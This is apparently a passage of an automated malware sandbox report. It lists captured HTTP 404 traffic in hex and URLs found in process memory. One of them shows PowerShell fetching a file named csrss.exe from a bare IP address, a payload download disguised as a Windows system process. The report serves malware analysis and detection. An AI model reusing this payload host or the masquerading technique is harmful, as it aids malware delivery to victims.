ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121229&min_rtt=121229&rtt_var=60614&sent=2&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=6995&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa 95 3c 98 Data Ascii: 82cY_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5( <
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X4FUvXQg1TfrNz26u%2B%2B12jv3%2FVPNbL66CkfpKdC3pAhsPpTHNJiAA0PU%2B8a1fgpFnFDv7qpO8DXXQpOVh%2BLme3vbs4oKDiFS2onb0c7hioGAJpAfOjfliTu2sohSslkjUG8A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9306365a9d39347f-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121330&min_rtt=121330&rtt_var=60665&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=458&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c Data Ascii: 19cb<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,Bl
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKPckmjmhq7kq7Uix2tBnUdFBzhLNAuVBkOZHCK2bV0NVfygcS0iff1kFcf9Fi%2BBNifgiuIb6NeogzV3DVBGYjJT0Q%2FOTMUrAaKnRHSfTOxlCTEZxZN9qFUuQAfa1fxVvf5VrTce"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636d5bf5731ce-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126097&min_rtt=126097&rtt_var=63048&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FPyrM6AKxi1Yc%2BhhG7L7g%2B6QfuOUwirloKi5FFAkupMkf9GbrOTt5kTV%2FSz%2BewIF3bIQf%2Boc86s7GliiAv2pDV85I8Xnl2YbHQkCtON9U7SmDI%2BXy0%2BLqJ3En3Ru9VnFIPU0pxt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636e65f6f8cfd-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124458&min_rtt=124458&rtt_var=62229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xwqL0GZhUVeyP1v74wC9dVxqUZ5MQD51hqobIdI5%2Bd4%2FDR3w5X0Yh35sbvyyWkEapmlXs7j1xSgH7%2FaTOuuAjrU1OTPLDCXNWwg9O0WywE4Dtx0eYJNEhmAcPNe3BAXOZs5xSCFj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636f71a378dc6-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=123436&min_rtt=123436&rtt_var=61718&sent=3&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=43200CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unm4Rlu%2FQXg%2B%2BeXFZCDOFOkoZcrLOwC6oB58Zcdr%2BNfWowgk4p7jMVuxWDDBNDoXiVLJEgQUqeEQgNYgrU02n9mh9rJWTNk16fhGw0S8wX1qO%2FeRWZn0fkklW1DvPYdMqvzxKiMc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063707bf085674-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121928&min_rtt=121928&rtt_var=60964&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=461&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE a
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/470/csrss.ex
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/470/csrss.exe
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: svchost.exe, 00000004.00000002.2818601575.000001E5BD600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
